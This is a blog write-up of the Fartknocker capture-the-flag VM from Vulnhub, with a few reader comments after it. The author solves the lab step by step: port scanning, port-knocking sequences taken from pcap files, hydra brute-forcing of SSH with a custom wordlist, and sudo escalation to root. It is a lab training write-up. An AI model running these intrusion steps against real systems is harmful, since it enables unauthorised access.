Thursday, 16 April 2015

TopHatSec - Fartknocker VM - Hosted on Vulnhub


arp gives:


Address                  HWtype  HWaddress           Flags Mask            Iface           ether   08:00:27:91:bc:58   C                     vboxnet0



Nmap 6.47 scan initiated Sat Apr 11 10:48:06 2015 as: nmap -sS -A -p- -oA fartknocker
Nmap scan report for
Host is up (0.0012s latency).
Not shown: 65534 closed ports
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:91:BC:58 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop

1   1.18 ms

OS and Service detection performed. Please report any incorrect results at .
# Nmap done at Sat Apr 11 10:48:23 2015 -- 1 IP address (1 host up) scanned in 17.77 seconds

The scan shows a webserver running



- Nikto v2.1.5/2.1.5
+ Target Host:
+ Target Port: 80
+ GET /: Server leaks inodes via ETags, header found with file /, fields: 0x68 0x5105a792cb1f8
+ GET /: The anti-clickjacking X-Frame-Options header is not present.
+ -3233: GET /icons/README: /icons/README: Apache default file found


Not much from that.......

So i decided to visit the page with a browser

The link Wooah gives pcap1.pcap

Opening it up with Wireshark, gives allot of ICMP flying back and fourth, however lower down something is happening.

TCP Ports 7000, 8000, 9000 and 8888 are used.

I probed into this, knowing that knockd was a possibility (given there is a webserver running with no means of remote administration in place)

Given my python abilities are... basic to say the least, i knocked up a simple bash script utilising netcat

nc -v 7000
nc -v 8000
nc -v 9000
nc -v 8888

After a few frustrating attempts, it finally worked!


nc: connect to port 7000 (tcp) failed: Connection refused
nc: connect to port 8000 (tcp) failed: Connection refused
nc: connect to port 9000 (tcp) failed: Connection refused
Connection to 8888 port [tcp/*] succeeded!


Visiting the site with a browser gives:

The link gives another pcap file, pcap2.pcap.


Wireshark shows some more ICMP and ARP traffic.
however more connections are established, to different ports

Connections to TCP 21, UDP 22, TCP 80 and 8080, then a connection was estabished to http-alt (port 8080) and data went back and fourth.

So i probed with another bash script to ports 1,3,3,7 to no avail.
I decided to go slightly more upmarket and use knock-knock.
After a bit of tweaking the script kicked in.

[-] Scanning with Nmap, this could take a minute...go get some coffee

[-] Sending default knockd sequence to

[-] Scanning again...too soon for more coffee???

[+] 1 new port(s) opened...
(1337, 'tcp')

Writing to output file - outfile.txt

it showed port 1337  was now open

nc -vv 1337
Connection to 1337 port [tcp/*] succeeded!

No Pcap file this time though, however "all about that base" was a clue

 echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" > base64_encoded.txt

base64 -d base64_encoded.txt
Open up SSH: 8888 9999 7777 6666

Another knocking sequence, so i returned to my bash script method.

nc -v 8888
nc -v 9999
nc -v 7777
nc -v 6666
nc -v 22

nc: connect to port 8888 (tcp) failed: Connection refused
nc: connect to port 9999 (tcp) failed: Connection refused
nc: connect to port 7777 (tcp) failed: Connection refused
nc: connect to port 6666 (tcp) failed: Connection refused
Connection to 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2

Port 22 is not open, nice one!

# CONGRATS! YOU HAVE OPENED THE SSH SERVER                            #
# USERNAME: butthead                                                                              #
# PASSWORD: nachosrule                                                                           #

However this was not to be as smooth as i initally thought..

butthead@'s password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)

 * Documentation:
Last login: Sun Apr 12 15:01:54 2015 from
You are only logging in for a split second! What do you do!
Connection to closed.


A little digging in the man pages of ssh i stumbled across it


     ssh — OpenSSH SSH client (remote login program)

     ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
         [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file]
         [-L [bind_address:]port:host:hostport] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option]
         [-p port] [-Q cipher | cipher-auth | mac | kex | key] [-R [bind_address:]port:host:hostport]
         [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command]

ssh -l butthead /bin/bash
butthead@'s password:

 After a few seconds waiting thinking i gave the "ls" command

uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)
cat nachos
Great job on getting this far.

Can you login as beavis or root ?

this was another hint..

cat /etc/passwd | grep beavis

I took a while looking through the home folder of "beavis" and not finding much, I decided to set hydra loose on the ssh service.

 After no luck using conventional wordlists I used cewl to generate my own from a wikipedia page on Beavis and Butthead

[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[22][ssh] host:   login: beavis   password: mikejudge
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2015-04-12 22:08:18

 Hydra had found a valid password for the user "beavis"

Logging in....

beavis@'s password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)

 * Documentation:
Last login: Sun Apr 12 17:07:32 2015 from

It was starting to go very well, time to start looking for ways to obtain root...

beavis@Huhuhhhhhuhuhhh:~$ id
uid=1000(beavis) gid=1000(beavis) groups=1000(beavis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
beavis@Huhuhhhhhuhuhhh:~$ sudo -l
[sudo] password for beavis: 

Matching Defaults entries for beavis on Huhuhhhhhuhuhhh:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User beavis may run the following commands on Huhuhhhhhuhuhhh:
    (ALL : ALL) ALL

A quick check of id shows beavis is : groups 27(sudo)  and can commands ( ALL : ALL ) ALL

beavis@Huhuhhhhhuhuhhh:~$ sudo bash
root@Huhuhhhhhuhuhhh:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Huhuhhhhhuhuhhh:~# cd /root
root@Huhuhhhhhuhuhhh:/root# ls
root@Huhuhhhhhuhuhhh:/root# more SECRETZ
You have done a great job, if you can see this, please shoot me an email
and let me know that you have beat this box!




Thanks to everyone at Vulnhub for the guidance over the time ive been there.

Special Thanks To Tophatsec for creating this challenge.


  1. So disappointed. Not even a clue how you did it. All your phases are just guessing types. Learn "how" to explain.

  2. I agree, however I think I was trying to keep us basic bulletpoints and not to get wrapped up in technicalities when I wrote this a few years back.

    I remind you I am not a hired pentester, and a mere hobbyist.

    If you came into this expecting some kind of report, then you are mistaken.

  3. Thanks you for your feedback, I will utilise this in my next one.